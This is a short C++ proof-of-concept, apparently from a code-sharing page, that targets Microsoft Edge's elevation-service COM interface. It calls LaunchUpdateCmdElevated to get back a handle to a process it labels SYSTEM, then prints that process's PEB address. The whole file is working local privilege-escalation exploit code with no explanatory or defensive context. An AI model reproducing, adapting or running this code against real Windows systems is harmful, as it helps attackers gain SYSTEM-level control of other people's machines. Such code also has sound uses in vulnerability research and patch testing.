1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
#pragma once
#include <windows.h>
#include <wrl.h>
#include <comdef.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
using namespace Microsoft::WRL;
class __declspec(uuid("c9c2b807-7731-4f34-81b7-44ff7779522b")) IElevatorEdge : public IUnknown
{
public:
virtual HRESULT __stdcall RunRecoveryCRXElevated(WCHAR* crx_path,
WCHAR* browser_appid,
WCHAR* browser_version,
WCHAR* session_id,
DWORD caller_proc_id,
ULONG_PTR* proc_handle);
virtual HRESULT __stdcall LaunchUpdateCmdElevated(WCHAR* browser_appid,
WCHAR* cmd_id,
UINT caller_proc_id,
PHANDLE proc_handle);
};
static HRESULT Check(HRESULT hr)
{
if (FAILED(hr))
throw _com_error(hr, nullptr);
return hr;
}
int main() {
Check(CoInitializeEx(nullptr, COINIT_MULTITHREADED));
IID CLS_EDGESVC;
CLSIDFromString(L"{1FCBE96C-1697-43AF-9140-2897C7C69767}", &CLS_EDGESVC);
ComPtr<IElevatorEdge> iEleEdge;
Check(CoCreateInstance(CLS_EDGESVC, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&iEleEdge)));
//getchar();
DWORD dwClientPID = GetCurrentProcessId();
HANDLE proc_handle;
GUID appid;
WCHAR strAppID[100] = { 0x0 };
CoCreateGuid(&appid);
StringFromGUID2(appid, strAppID, 100);
HANDLE hToken;
CoSetProxyBlanket(iEleEdge.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_NONE, COLE_DEFAULT_PRINCIPAL, RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DEFAULT);
HRESULT hr = iEleEdge->LaunchUpdateCmdElevated(L"{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}", L"on-os-upgrade", dwClientPID, &proc_handle);
printf("handle: 0x%x\n", proc_handle);
PROCESS_BASIC_INFORMATION peb = { 0 };
ULONG retLength;
NtQueryInformationProcess(proc_handle, ProcessBasicInformation, &peb, sizeof(peb), &retLength);
printf("%d SYSTEM PROCESS PEB AT: 0x%p\n", peb.UniqueProcessId, peb.PebBaseAddress);
getchar();
return 0;
}
|
